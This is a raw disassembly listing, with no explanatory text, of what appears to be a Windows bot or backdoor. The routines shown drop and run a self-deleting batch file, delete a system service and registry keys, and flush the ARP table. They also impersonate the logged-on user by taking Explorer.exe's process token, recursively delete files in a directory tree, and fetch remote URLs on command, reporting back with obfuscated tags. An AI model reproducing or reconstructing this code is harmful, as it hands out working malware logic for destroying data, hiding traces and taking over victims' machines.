jz short loc_4279BE
cmp [ebp+arg_8], esi
jz short loc_4279BE
cmp byte ptr [eax], 0
jz short loc_4279BE
push ebx
push edi
call sub_436200
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_4279B9
push [ebp+arg_4]
push edi
call sub_42ADD0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4279B2
sub eax, edi
push eax
push edi
push ebx
call sub_429C40
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_4292D0
push eax
push [ebp+arg_8]
push ebx
call sub_429910
push [ebp+arg_4]
call sub_4292D0
add esp, 20h
add eax, esi
push eax
push ebx
call dword_437090 ; lstrcatA
push ebx
push edi
call dword_4370A4 ; lstrcpyA
mov esi, edi
loc_4279B2: ; CODE XREF: sub_427931+3C�j
push ebx
call sub_429822
pop ecx
loc_4279B9: ; CODE XREF: sub_427931+2B�j
mov eax, esi
pop ebx
jmp short loc_4279C0
; ---------------------------------------------------------------------------
loc_4279BE: ; CODE XREF: sub_427931+C�j
; sub_427931+13�j ...
xor eax, eax
loc_4279C0: ; CODE XREF: sub_427931+8B�j
pop edi
pop esi
pop ebp
retn
sub_427931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4279C4 proc near ; CODE XREF: sub_427A85+38�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_4279F4
; ---------------------------------------------------------------------------
loc_4279DE: ; CODE XREF: sub_4279C4+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_4279EF
cmp dl, 2Ah
jnz short loc_427A01
cmp dl, 3Fh
jnz short loc_4279F2
loc_4279EF: ; CODE XREF: sub_4279C4+1F�j
inc ecx
mov [edi], ecx
loc_4279F2: ; CODE XREF: sub_4279C4+29�j
inc dword ptr [esi]
loc_4279F4: ; CODE XREF: sub_4279C4+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_4279DE
jmp short loc_427A01
; ---------------------------------------------------------------------------
loc_4279FE: ; CODE XREF: sub_4279C4+40�j
inc eax
mov [esi], eax
loc_427A01: ; CODE XREF: sub_4279C4+24�j
; sub_4279C4+38�j
cmp byte ptr [eax], 2Ah
jz short loc_4279FE
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_427A23
cmp [eax], bl
jz short loc_427A16
xor eax, eax
jmp short loc_427A80
; ---------------------------------------------------------------------------
loc_427A16: ; CODE XREF: sub_4279C4+4C�j
cmp dl, bl
jnz short loc_427A23
cmp [eax], bl
jnz short loc_427A23
xor eax, eax
inc eax
jmp short loc_427A80
; ---------------------------------------------------------------------------
loc_427A23: ; CODE XREF: sub_4279C4+48�j
; sub_4279C4+54�j ...
push ecx
push eax
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz short loc_427A6A
loc_427A30: ; CODE XREF: sub_4279C4+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_427A42
; ---------------------------------------------------------------------------
loc_427A36: ; CODE XREF: sub_4279C4+86�j
cmp cl, 5Bh
jz short loc_427A4C
cmp dl, bl
jz short loc_427A4C
inc eax
mov [edi], eax
loc_427A42: ; CODE XREF: sub_4279C4+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_427A36
loc_427A4C: ; CODE XREF: sub_4279C4+75�j
; sub_4279C4+79�j
cmp [eax], bl
jz short loc_427A61
push eax
push dword ptr [esi]
call sub_427A85
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_427A66
; ---------------------------------------------------------------------------
loc_427A61: ; CODE XREF: sub_4279C4+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_427A66: ; CODE XREF: sub_4279C4+9B�j
cmp eax, ebx
jnz short loc_427A30
loc_427A6A: ; CODE XREF: sub_4279C4+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_427A7D
mov eax, [esi]
cmp [eax], bl
jnz short loc_427A7D
mov [ebp+var_4], 1
loc_427A7D: ; CODE XREF: sub_4279C4+AA�j
; sub_4279C4+B0�j
mov eax, [ebp+var_4]
loc_427A80: ; CODE XREF: sub_4279C4+50�j
; sub_4279C4+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4279C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427A85 proc near ; CODE XREF: sub_4044F6+1AF�p
; sub_4044F6+1CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_427ACC
; ---------------------------------------------------------------------------
loc_427A91: ; CODE XREF: sub_427A85+4B�j
cmp eax, 1
jnz short loc_427ADA
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_427ADA
cmp cl, 2Ah
jz short loc_427AB5
cmp cl, 3Fh
jz short loc_427AB0
xor eax, eax
cmp cl, dl
setz al
loc_427AB0: ; CODE XREF: sub_427A85+22�j
inc [ebp+arg_4]
jmp short loc_427AC8
; ---------------------------------------------------------------------------
loc_427AB5: ; CODE XREF: sub_427A85+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4279C4
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_427AC8: ; CODE XREF: sub_427A85+2E�j
inc esi
mov [ebp+arg_0], esi
loc_427ACC: ; CODE XREF: sub_427A85+A�j
mov cl, [esi]
test cl, cl
jnz short loc_427A91
jmp short loc_427ADA
; ---------------------------------------------------------------------------
loc_427AD4: ; CODE XREF: sub_427A85+58�j
cmp eax, 1
jnz short loc_427AF6
inc esi
loc_427ADA: ; CODE XREF: sub_427A85+F�j
; sub_427A85+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_427AD4
cmp eax, 1
jnz short loc_427AF6
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_427AF6
cmp byte ptr [esi], 0
jnz short loc_427AF6
xor eax, eax
inc eax
jmp short loc_427AF8
; ---------------------------------------------------------------------------
loc_427AF6: ; CODE XREF: sub_427A85+52�j
; sub_427A85+5D�j ...
xor eax, eax
loc_427AF8: ; CODE XREF: sub_427A85+6F�j
pop esi
pop ebp
retn
sub_427A85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427AFB proc near ; CODE XREF: sub_418EDB+15F�p
var_90 = byte ptr -90h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
mov edi, offset byte_445813
push 1
mov esi, offset dword_445714
push edi
push esi
push dword_445710
call sub_421277
add esp, 10h
test eax, eax
jz short loc_427B2B
push 7Fh
jmp short loc_427B9D
; ---------------------------------------------------------------------------
loc_427B2B: ; CODE XREF: sub_427AFB+2A�j
lea eax, [ebp+var_10]
push eax
call dword_437138 ; GetLocalTime
mov ax, [ebp+var_8]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_427BB0
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_427B4C: ; CODE XREF: sub_427AFB+BB�j
push ecx
mov ebx, 80h
movzx ecx, [ebp+var_6]
push ecx
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "%.2d/%.2d/%4d, %.2d:%.2d %s"
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429AEE
lea eax, [ebp+var_90]
push 1
push eax
push edi
push esi
push dword_445710
call sub_421340
add esp, 38h
test eax, eax
jz short loc_427BAB
push ebx
lea eax, [ebp+var_90]
loc_427B9D: ; CODE XREF: sub_427AFB+2E�j
push eax
push offset dword_6763F8
call sub_429C40
add esp, 0Ch
loc_427BAB: ; CODE XREF: sub_427AFB+99�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_427BB0: ; CODE XREF: sub_427AFB+47�j
movzx eax, ax
sub eax, 0Ch
jmp short loc_427B4C
sub_427AFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427BB8 proc near ; CODE XREF: sub_418D49+1A�p
; sub_427CE1+9B�p
var_80C = byte ptr -80Ch
var_40C = byte ptr -40Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80Ch
push esi
lea eax, [ebp+var_80C]
push edi
push eax
push 400h
call dword_4370A8 ; GetTempPathA
lea eax, [ebp+var_108]
push 104h
xor esi, esi
push eax
push esi
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
call sub_429ACC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
idiv edi
lea eax, [ebp+var_80C]
push edx
push offset dword_44399C
push eax
lea eax, [ebp+var_20C]
push offset aSSIIII_bat ; "%s\\%s%i%i%i%i.bat"
push eax
call sub_429A33
add esp, 20h
lea eax, [ebp+var_108]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_20C]
push 40000000h
push eax
call dword_43705C ; CreateFileA
mov edi, eax
cmp edi, esi
jbe short loc_427CDD
lea eax, [ebp+var_108]
cmp [ebp+arg_0], esi
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_40C]
jnz short loc_427C95
push offset a@echoOffRepeat ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nping "...
jmp short loc_427C9A
; ---------------------------------------------------------------------------
loc_427C95: ; CODE XREF: sub_427BB8+D4�j
push offset a@echoOffRepe_0 ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nif ex"...
loc_427C9A: ; CODE XREF: sub_427BB8+DB�j
push eax
call sub_429A33
add esp, 14h
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_40C]
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_40C]
push eax
push edi
call dword_437078 ; WriteFile
push edi
call dword_437044 ; CloseHandle
push esi
push esi
lea eax, [ebp+var_20C]
push esi
push eax
push esi
push esi
call dword_456E54 ; ShellExecuteA
loc_427CDD: ; CODE XREF: sub_427BB8+B4�j
pop edi
pop esi
leave
retn
sub_427BB8 endp
; =============== S U B R O U T I N E =======================================
sub_427CE1 proc near ; CODE XREF: sub_40A938+B1B�p
; sub_4181F4+645�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_456F08 ; OpenSCManagerA
push 0F01FFh
push offset dword_4439B0
push eax
call dword_456DA8 ; OpenServiceA
push eax
call dword_456E30 ; DeleteService
mov edi, offset byte_443B3B
mov esi, offset dword_443A3C
push edi
push esi
push dword_443A38
call sub_420EA3
push edi
push esi
push 80000001h
call sub_420EA3
add esp, 18h
cmp [esp+0Ch+arg_4], ebx
jz short loc_427D64
push offset byte_445403
push offset dword_445304
push dword_445300
call sub_420EA3
push offset byte_445813
push offset dword_445714
push dword_445710
call sub_420EA3
add esp, 18h
loc_427D64: ; CODE XREF: sub_427CE1+54�j
push dword_457F44
call dword_4370CC ; ReleaseMutex
cmp [esp+0Ch+arg_0], ebx
jnz short loc_427D82
call sub_4234DB
push ebx
call sub_427BB8
pop ecx
loc_427D82: ; CODE XREF: sub_427CE1+93�j
pop edi
pop esi
pop ebx
retn
sub_427CE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427D86 proc near ; CODE XREF: sub_41C172+C1�p
; sub_41C172+E4�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_675FC0
push 0
push edi
call sub_429690
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_427DAB: ; CODE XREF: sub_427D86+5B�j
; sub_427D86+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_42BD00
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_42BD80
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_427DE9
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_427DAB
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_427DAB
; ---------------------------------------------------------------------------
loc_427DE9: ; CODE XREF: sub_427D86+4B�j
mov eax, edi
jmp short loc_427DF2
; ---------------------------------------------------------------------------
loc_427DED: ; CODE XREF: sub_427D86+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_427DF2: ; CODE XREF: sub_427D86+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_427DED
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_427D86 endp
; =============== S U B R O U T I N E =======================================
sub_427E04 proc near ; CODE XREF: sub_418EDB+5C6�p
mov ecx, dword_456DF4
xor eax, eax
test ecx, ecx
jz short locret_427E12
jmp ecx
; ---------------------------------------------------------------------------
locret_427E12: ; CODE XREF: sub_427E04+A�j
retn
sub_427E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E13 proc near ; CODE XREF: sub_40A938+2821�p
; sub_41EB23+33�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_456FAC ; GetIpNetTable
sub eax, edi
jz short loc_427E72
sub eax, 32h
jz short loc_427E6D
sub eax, 48h
jnz short loc_427E6D
push [ebp+var_8]
call sub_4296E8
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_429690
add esp, 10h
cmp esi, edi
jz short loc_427E6D
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_456FAC ; GetIpNetTable
test eax, eax
jz short loc_427E72
loc_427E6D: ; CODE XREF: sub_427E13+28�j
; sub_427E13+2D�j ...
mov [ebp+var_4], edi
jmp short loc_427E88
; ---------------------------------------------------------------------------
loc_427E72: ; CODE XREF: sub_427E13+23�j
; sub_427E13+58�j
cmp [esi], edi
jbe short loc_427E88
lea ebx, [esi+4]
loc_427E79: ; CODE XREF: sub_427E13+73�j
push ebx
call dword_456FA8 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_427E79
loc_427E88: ; CODE XREF: sub_427E13+5D�j
; sub_427E13+61�j
push esi
call sub_429822
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_427E13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E97 proc near ; CODE XREF: sub_427F4E+9�p
var_110C = dword ptr -110Ch
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 110Ch
call sub_429A90
push ebx
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_110C]
push 1000h
push eax
call dword_456F10
test eax, eax
jz short loc_427F3E
mov edi, [ebp+var_4]
push 0
shr edi, 2
pop esi
jz short loc_427F3E
loc_427ECC: ; CODE XREF: sub_427E97+A5�j
lea eax, [ebp+var_10C]
push offset aUnknown ; "unknown"
push eax
call dword_4370A4 ; lstrcpyA
push [ebp+esi*4+var_110C]
push 0
push 411h
call dword_437104 ; OpenProcess
mov ebx, eax
test ebx, ebx
jz short loc_427F39
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 4
push eax
push ebx
call dword_456ECC
test eax, eax
jz short loc_427F39
lea eax, [ebp+var_10C]
push 104h
push eax
push [ebp+var_8]
push ebx
call dword_456E00
lea eax, [ebp+var_10C]
push eax
push offset aExplorer_exe ; "Explorer.exe"
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_427F45
loc_427F39: ; CODE XREF: sub_427E97+5F�j
; sub_427E97+74�j
inc esi
cmp esi, edi
jb short loc_427ECC
loc_427F3E: ; CODE XREF: sub_427E97+28�j
; sub_427E97+33�j
xor eax, eax
loc_427F40: ; CODE XREF: sub_427E97+B5�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_427F45: ; CODE XREF: sub_427E97+A0�j
mov eax, [ebp+esi*4+var_110C]
jmp short loc_427F40
sub_427E97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F4E proc near ; CODE XREF: sub_4053EE+C�p
; sub_423BB1:loc_423C26�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push edi
call sub_427E97
test eax, eax
jz short loc_427F9E
push eax
push 1
push 1F0FFFh
call dword_437104 ; OpenProcess
mov edi, eax
test edi, edi
jz short loc_427F9E
lea eax, [ebp+var_4]
push esi
push eax
push 0Ah
push edi
call dword_456EF8 ; OpenProcessToken
mov esi, dword_437044
test eax, eax
jz short loc_427F9A
push [ebp+var_4]
call dword_456FEC ; ImpersonateLoggedOnUser
push [ebp+var_4]
call esi ; dword_437044
loc_427F9A: ; CODE XREF: sub_427F4E+3C�j
push edi
call esi ; dword_437044
pop esi
loc_427F9E: ; CODE XREF: sub_427F4E+10�j
; sub_427F4E+24�j
pop edi
leave
retn
sub_427F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427FA1 proc near ; CODE XREF: sub_423BB1+18�p
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 178h
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_C], ebx
call dword_456F08 ; OpenSCManagerA
mov [ebp+var_4], eax
loc_427FC2: ; CODE XREF: sub_427FA1+7F�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_178]
push 168h
push eax
push 3
push 30h
push [ebp+var_4]
call dword_456EC0 ; EnumServicesStatusA
test eax, eax
jnz short loc_427FF8
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz short loc_428022
loc_427FF8: ; CODE XREF: sub_427FA1+48�j
xor edi, edi
cmp [ebp+var_8], ebx
jle short loc_42801D
lea esi, [ebp+var_178]
loc_428005: ; CODE XREF: sub_427FA1+7A�j
push [ebp+arg_0]
push dword ptr [esi]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_428032
inc edi
add esi, 24h
cmp edi, [ebp+var_8]
jl short loc_428005
loc_42801D: ; CODE XREF: sub_427FA1+5C�j
cmp [ebp+var_C], ebx
jnz short loc_427FC2
loc_428022: ; CODE XREF: sub_427FA1+55�j
push [ebp+var_4]
call dword_456DC4 ; CloseServiceHandle
xor eax, eax
loc_42802D: ; CODE XREF: sub_427FA1+A3�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_428032: ; CODE XREF: sub_427FA1+71�j
lea eax, [edi+edi*8]
xor ecx, ecx
cmp [ebp+eax*4+var_16C], 4
setz cl
mov eax, ecx
jmp short loc_42802D
sub_427FA1 endp
; =============== S U B R O U T I N E =======================================
sub_428046 proc near ; CODE XREF: sub_40A938+4CD0�p
; sub_428046+C7�p
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
arg_0 = dword ptr 4
sub esp, 144h
push ebx
mov ebx, dword_437148
push ebp
push esi
mov esi, [esp+150h+arg_0]
push edi
push esi
call ebx ; dword_437148
push esi
call sub_4292D0
add eax, 4
push eax
call sub_4296E8
pop ecx
mov edi, eax
pop ecx
push esi
push edi
call dword_4370A4 ; lstrcpyA
mov ebp, dword_437090
push offset a_ ; "\\*.*"
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_140]
push eax
push edi
call dword_437144 ; FindFirstFileA
mov [esp+154h+var_144], eax
loc_428099: ; CODE XREF: sub_428046+F3�j
; sub_428046+10F�j
cmp [esp+154h+var_144], 0FFFFFFFFh
jz loc_42815E
push esi
call sub_4292D0
mov edi, eax
lea eax, [esp+158h+var_114]
push eax
call sub_4292D0
lea eax, [edi+eax+1]
push eax
call sub_4296E8
add esp, 0Ch
mov edi, eax
push esi
push edi
call dword_4370A4 ; lstrcpyA
push offset asc_44DA9C ; "\\"
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_114]
push eax
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_114]
push offset dword_43AB8C
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_428141
lea eax, [esp+154h+var_114]
push offset a__ ; ".."
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_428141
test [esp+154h+var_140], 10h
jz short loc_428115
push edi
call sub_428046
pop ecx
jmp short loc_428128
; ---------------------------------------------------------------------------
loc_428115: ; CODE XREF: sub_428046+C4�j
push 80h
push edi
call dword_437068 ; SetFileAttributesA
push edi
call dword_437060 ; DeleteFileA
loc_428128: ; CODE XREF: sub_428046+CD�j
lea eax, [esp+154h+var_140]
push eax
push [esp+158h+var_144]
call dword_437140 ; FindNextFileA
test eax, eax
jnz loc_428099
jmp short loc_42815E
; ---------------------------------------------------------------------------
loc_428141: ; CODE XREF: sub_428046+A9�j
; sub_428046+BD�j
push edi
call ebx ; dword_437148
lea eax, [esp+154h+var_140]
push eax
push [esp+158h+var_144]
call dword_437140 ; FindNextFileA
test eax, eax
jnz loc_428099
push esi
call ebx ; dword_437148
loc_42815E: ; CODE XREF: sub_428046+58�j
; sub_428046+F9�j
push [esp+154h+var_144]
call dword_43713C ; FindClose
push 10h
push esi
call dword_437068 ; SetFileAttributesA
push esi
call ebx ; dword_437148
pop edi
pop esi
pop ebp
pop ebx
add esp, 144h
retn
sub_428046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42817F proc near ; DATA XREF: sub_40A938+8250�o
var_2B6C = byte ptr -2B6Ch
var_45C = byte ptr -45Ch
var_35C = byte ptr -35Ch
var_2DC = byte ptr -2DCh
var_25C = byte ptr -25Ch
var_1DC = dword ptr -1DCh
var_1D8 = byte ptr -1D8h
var_158 = byte ptr -158h
var_D8 = byte ptr -0D8h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2B6Ch
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_1DC]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+190h], esi
mov eax, [ebp+var_1DC]
mov [ebp+arg_0], eax
push edi
lea eax, [ebp+var_35C]
push ebx
push eax
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], offset asc_450DB8 ; "*/*"
call sub_429690
push edi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_429690
push edi
lea eax, [ebp+var_25C]
push ebx
push eax
call sub_429690
push 100h
lea eax, [ebp+var_45C]
push ebx
push eax
call sub_429690
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_429690
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_1D8]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1D8]
push eax
call dword_456DC8 ; InternetCrackUrlA
test eax, eax
jz loc_428331
cmp [ebp+var_34], ebx
jbe short loc_428263
push [ebp+var_34]
lea eax, [ebp+var_35C]
push [ebp+var_38]
push eax
call sub_429C40
add esp, 0Ch
loc_428263: ; CODE XREF: sub_42817F+CD�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_428281
push [ebp+var_28]
lea eax, [ebp+var_2DC]
push [ebp+var_2C]
push eax
call sub_429C40
add esp, 0Ch
loc_428281: ; CODE XREF: sub_42817F+EB�j
cmp [ebp+var_20], ebx
jbe short loc_42829B
push [ebp+var_20]
lea eax, [ebp+var_25C]
push [ebp+var_24]
push eax
call sub_429C40
add esp, 0Ch
loc_42829B: ; CODE XREF: sub_42817F+105�j
cmp [ebp+var_18], ebx
jbe short loc_4282B5
push [ebp+var_18]
lea eax, [ebp+var_45C]
push [ebp+var_1C]
push eax
call sub_429C40
add esp, 0Ch
loc_4282B5: ; CODE XREF: sub_42817F+11F�j
push ebx
push ebx
lea eax, [ebp+var_25C]
push 3
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_35C]
push esi
push eax
push dword_456EB0
call dword_456EE0 ; InternetConnectA
mov edi, eax
cmp edi, ebx
jz short loc_42834C
push ebx
lea eax, [ebp+var_C]
push 200h
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push ebx
push edi
call dword_456ED0 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_428358
push ebx
push ebx
push ebx
push ebx
push eax
call dword_456E5C ; HttpSendRequestA
test eax, eax
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
lea eax, [ebp+var_2B6C]
jz short loc_42832A
push offset aSUrlVisited_ ; "%s URL visited."
jmp short loc_428368
; ---------------------------------------------------------------------------
loc_42832A: ; CODE XREF: sub_42817F+1A2�j
push offset aSFailedToGetRe ; "%s Failed to get requested URL from HTT"...
jmp short loc_428368
; ---------------------------------------------------------------------------
loc_428331: ; CODE XREF: sub_42817F+C4�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
lea eax, [ebp+var_2B6C]
push offset aSInvalidUrl_ ; "%s Invalid URL."
push eax
call sub_429A33
mov edi, [ebp+var_8]
jmp short loc_42836E
; ---------------------------------------------------------------------------
loc_42834C: ; CODE XREF: sub_42817F+160�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push offset aSCouldNotOpenA ; "%s Could not open a connection."
jmp short loc_428362
; ---------------------------------------------------------------------------
loc_428358: ; CODE XREF: sub_42817F+188�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push offset aSFailedToConne ; "%s Failed to connect to HTTP server."
loc_428362: ; CODE XREF: sub_42817F+1D7�j
lea eax, [ebp+var_2B6C]
loc_428368: ; CODE XREF: sub_42817F+1A9�j
; sub_42817F+1B0�j
push eax
call sub_429A33
loc_42836E: ; CODE XREF: sub_42817F+1CB�j
add esp, 0Ch
cmp [ebp+var_54], ebx
mov esi, offset aS_5 ; "%s"
jnz short loc_42839A
cmp [ebp+var_50], ebx
jnz short loc_42839F
lea eax, [ebp+var_2B6C]
push eax
lea eax, [ebp+var_D8]
push esi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_42839A: ; CODE XREF: sub_42817F+1FA�j
cmp [ebp+var_50], ebx
jz short loc_4283B9
loc_42839F: ; CODE XREF: sub_42817F+1FF�j
lea eax, [ebp+var_2B6C]
push eax
lea eax, [ebp+var_D8]
push esi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_4283B9: ; CODE XREF: sub_42817F+21E�j
push edi
call dword_456F50 ; InternetCloseHandle
push [ebp+var_4]
call dword_456F50 ; InternetCloseHandle
push [ebp+var_58]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebx
sub_42817F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4283DC proc near ; DATA XREF: sub_40A938+6D9E�o
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 124h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_124]
rep movsd
mov dword ptr [eax+120h], 1
mov eax, [ebp+var_124]
xor ecx, ecx
mov [ebp+arg_0], eax
cmp [ebp+var_8], ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
